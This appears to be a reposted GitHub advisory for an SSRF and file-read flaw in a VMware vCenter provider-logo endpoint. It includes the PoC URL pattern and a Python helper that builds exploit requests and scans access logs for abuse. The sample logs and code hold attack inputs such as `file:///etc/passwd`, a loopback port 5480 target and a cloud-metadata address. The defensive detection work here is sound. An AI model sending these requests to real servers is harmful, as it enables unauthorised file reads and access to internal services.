code-scan starred VMware_vCenter
2021-12-04 01:12:19 Author: github.com (view original) Views: 64

POC

https://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}

File read:

SSRF + XSS:

Vulnerable code:

/etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jar

com.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()

Tested on vCenter 7.0.2.00100; the exact affected version range and CVE ID are not known.
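The PoC above is a single GET whose `url` parameter is fetched server-side, so the two things a practitioner wants next are a correctly encoded request and a way to spot abuse of the endpoint in access logs. The script below is an added example, not code from the l0ggg/VMware_vCenter repository or from VMware. Only the endpoint path and its `url` parameter come from the PoC; the combined-format log lines, the host `vcsa.example.test`, and the target URLs are constructed for the example, and the classification labels are the author's own. It builds the request URL with the target percent-encoded, labels what a server-side fetch of that target would reach (local file, loopback service, link-local metadata address, private range), and flags every provider-logo request in a log whose target is anything other than a plain external HTTP(S) URL.

```python
#!/usr/bin/env python3
"""Helpers for the vCenter provider-logo SSRF endpoint.

Added example, not code from the l0ggg/VMware_vCenter repository. Only the
endpoint path and its ?url= parameter come from the PoC; the log format,
host names and target URLs below are constructed for illustration.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlencode, urlsplit

ENDPOINT = "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"

# Combined-log-format line: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def build_poc_url(vcenter_host, target_url):
    """Build the request URL from the PoC, percent-encoding the attacker-chosen
    target so that ':' '/' and '?' inside it survive as one query value."""
    return f"https://{vcenter_host}{ENDPOINT}?{urlencode({'url': target_url})}"


def classify_target(target_url):
    """Label what a server-side fetch of target_url would reach.

    'file-read'        file:// scheme (local file disclosure)
    'non-http-scheme'  any other non-HTTP scheme (gopher, ftp, ...)
    'loopback'         127.0.0.0/8, ::1 or 'localhost' (locally bound services)
    'link-local'       169.254.0.0/16 (cloud metadata endpoints live here)
    'internal'         RFC 1918 / private ranges
    'external'         a public host, the only case a logo fetch is meant for
    """
    parts = urlsplit(target_url)
    scheme = parts.scheme.lower()
    if scheme == "file":
        return "file-read"
    if scheme not in ("http", "https"):
        return "non-http-scheme"
    host = (parts.hostname or "").lower()
    if host == "localhost":
        return "loopback"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # a hostname; DNS rebinding is out of scope here
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    if ip.is_private:
        return "internal"
    return "external"


def scan_access_log(lines):
    """Return one finding per provider-logo request whose url= value is not a
    plain external HTTP(S) URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, _method, request_path, status, _size = m.groups()
        req = urlsplit(request_path)
        if req.path != ENDPOINT:
            continue
        for target in parse_qs(req.query).get("url", []):
            label = classify_target(target)
            if label != "external":
                findings.append({"client": client, "time": ts, "target": target,
                                 "class": label, "status": int(status)})
    return findings


# Constructed sample log: one legitimate logo fetch, two abusive requests, one unrelated hit.
SAMPLE_LOG = """\
198.51.100.23 - - [04/Dec/2021:01:10:02 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https%3A%2F%2Fcdn.example.com%2Flogo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [04/Dec/2021:01:12:19 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1812 "-" "curl/7.68.0"
198.51.100.23 - - [04/Dec/2021:01:12:25 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=http%3A%2F%2F127.0.0.1%3A5480%2F HTTP/1.1" 200 3410 "-" "curl/7.68.0"
203.0.113.9 - - [04/Dec/2021:01:13:00 +0000] "GET /ui/login HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print(build_poc_url("vcsa.example.test", "http://169.254.169.254/latest/meta-data/"))
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['client']} {f['class']:<10} {f['target']} -> {f['status']}")
```

The classification deliberately treats `localhost`, loopback and link-local addresses separately from RFC 1918 space: a 200 on a loopback target tells an analyst the endpoint reached a service bound only to the appliance itself, while a link-local hit points at cloud metadata. Hostnames are left as "external" because resolving them at triage time would itself be a network request; DNS-rebinding style targets need a resolver-side check that this script does not attempt.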


Article source: https://github.com/l0ggg/VMware_vCenter